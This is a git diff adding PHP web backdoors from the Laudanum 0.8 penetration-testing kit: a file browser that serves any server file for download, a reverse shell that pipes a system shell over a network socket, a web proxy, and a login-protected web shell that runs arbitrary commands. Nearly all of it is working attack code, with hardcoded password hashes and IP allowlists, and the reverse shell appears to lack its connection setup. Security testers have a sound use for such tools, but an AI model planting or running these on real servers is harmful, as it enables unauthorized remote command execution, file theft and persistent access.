+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; +$file = isset($_GET["file"]) ? $_GET["file"] : ""; + +if ($file != "") { + if(file_exists($file)) { + + $s = split("/", $file); + $filename = $s[count($s) - 1]; + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($file)); + header("Content-Disposition: attachment; filename=\"".$filename."\""); + readfile($file); + die(); + } +} +?> + + + + Laudanum File Browser + + + + + + +

Laudanum File Browser 0.1

+Home
+ +Directory listing of / "; +$breadcrumb = '/'; +foreach ($dirs as $d) { + if ($d != '') { + $breadcrumb .= $d . "/"; + echo "$d/ "; + } +} +echo ""; + +// translate .. to a real dir +$parentdir = ""; +for ($i = 0; $i < count($dirs) - 2; $i++) { + $parentdir .= $dirs[$i] . "/"; +} + +echo ""; +echo ""; +echo ""; + +//get listing, separate into directories and files +$listingfiles = array(); +$listingdirs = array(); + +if ($handle = @opendir($curdir)) { + while ($o = readdir($handle)) { + if ($o == "." || $o == "..") continue; + if (@filetype($curdir . $o) == "dir") { + $listingdirs[] = $o . "/"; + } + else { + $listingfiles[] = $o; + } + } + + @natcasesort($listingdirs); + @natcasesort($listingfiles); + + //display directories + foreach ($listingdirs as $f) { + echo ""; + } + + //display files + foreach ($listingfiles as $f) { + echo ""; + } +} +else { + echo ""; +} +?> +
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php new file mode 100644 index 0000000..921c059 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php @@ -0,0 +1,192 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php new file mode 100644 index 0000000..1176fcd --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php @@ -0,0 +1,351 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page +// figure out how to reuse sessionid from the remote site + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Proxy + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - hard linked + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - relative reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + return $r; +} + +/* Initialize some variables we need again and again. */ +$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; +if ($url == "") { + $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; +} + +if ($url == "") { +?> + + + + Laudanum PHP Proxy + + + + + + +

Laudanum PHP Proxy

+ +
+ + +
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php new file mode 100644 index 0000000..a36848a --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php @@ -0,0 +1,409 @@ + +*** Tim Medin +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides shell access to the system. It is built based on the 2.1 +*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler +*** +*** +*** Updated by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("192.168.1.55", "12.2.2.2"); + +# format is "username" => "password" +# password is generated using sha1sum as shown below (don't forget the -n, KEVIN!) +# echo -n Password1 | sha1sum +$users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Shell Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +function logout() { + $_SESSION = array('authenticated' => false); + if (isset($_COOKIE[session_name()])) + setcookie(session_name(), '', time()-42000, '/'); + session_destroy(); +} + + +function stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +/* Initialize some variables we need again and again. */ +$username = isset($_POST['username']) ? $_POST['username'] : ''; +$password = isset($_POST['password']) ? $_POST['password'] : ''; +$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; + +$command = isset($_POST['command']) ? $_POST['command'] : ''; +$rows = isset($_POST['rows']) ? $_POST['rows'] : 24; +$columns = isset($_POST['columns']) ? $_POST['columns'] : 80; + + +///* Default settings --- these settings should always be set to something. */ +//$default_settings = array('home-directory' => '.'); + +///* Merge settings. */ +//$ini['settings'] = array_merge($default_settings, $ini['settings']); + + +session_start(); + +/* Delete the session data if the user requested a logout. This leaves the + * session cookie at the user, but this is not important since we + * authenticates on $_SESSION['authenticated']. */ +if (isset($_POST['logout'])) + logout(); + +///* Attempt authentication. */ +//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && +// isset($ini['users'][$username])) { +// if (strchr($ini['users'][$username], ':') === false) { +// // No seperator found, assume this is a password in clear text. +// $_SESSION['authenticated'] = ($ini['users'][$username] == $password); +// } else { +// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); +// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); +// } +//} + +/* Attempt authentication. */ +if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) + $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); + +/* Enforce default non-authenticated state if the above code didn't set it + * already. */ +if (!isset($_SESSION['authenticated'])) + $_SESSION['authenticated'] = false; + +if ($_SESSION['authenticated']) { + /* Initialize the session variables. */ + if (empty($_SESSION['cwd'])) { + $_SESSION['cwd'] = '.'; + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; + } + + if (!empty($command)) { + /* Save the command for late use in the JavaScript. If the command is + * already in the history, then the old entry is removed before the + * new entry is put into the list at the front. */ + if (($i = array_search($command, $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + + array_unshift($_SESSION['history'], $command); + + /* Now append the commmand to the output. */ + $_SESSION['output'] .= '$ ' . $command . "\n"; + + /* Initialize the current working directory. */ + if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { + /* The current command is a 'cd' command which we have to handle + * as an internal shell command. */ + + if ($regs[1]{0} == '/') { + /* Absolute path, we use it unchanged. */ + $new_dir = $regs[1]; + } else { + /* Relative path, we append it to the current working + * directory. */ + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; + } + + /* Transform '/./' into '/' */ + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + + /* Transform '//' into '/' */ + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + + /* Transform 'x/..' into '' */ + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + + if ($new_dir == '') $new_dir = '/'; + + /* Try to change directory. */ + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; + } + + } elseif (trim($command) == 'exit') { + logout(); + } else { + + /* The command is not an internal command, so we execute it after + * changing the directory and save the output. */ + chdir($_SESSION['cwd']); + + // We canot use putenv() in safe mode. + if (!ini_get('safe_mode')) { + // Advice programs (ls for example) of the terminal size. + putenv('ROWS=' . $rows); + putenv('COLUMNS=' . $columns); + } + + /* Alias expansion. */ + $length = strcspn($command, " \t"); + $token = substr($command, 0, $length); + if (isset($ini['aliases'][$token])) + $command = $ini['aliases'][$token] . substr($command, $length); + + $io = array(); + $p = proc_open($command, + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + + /* Read output sent to stdout. */ + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); + } + /* Read output sent to stderr. */ + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); + } + + fclose($io[1]); + fclose($io[2]); + proc_close($p); + } + } + + /* Build the command history for use in the JavaScript */ + if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; + } +} + +?> + + + + Laudanum Shell + + + + + + + +

Laudanum Shell

+ +
+ + + +
+ Authentication + + Login failed, please try again:

' . "\n"; + else + echo "

Please login:

\n"; + ?> + +

Username:

+ +

Password:

+ +

+ + + +
+ + + +
+ Current Working Directory: + + +
+ +

+ $  +

+
+ +

+ Size: × + + + +

+ +
+ + + +
+ + +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Updated by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +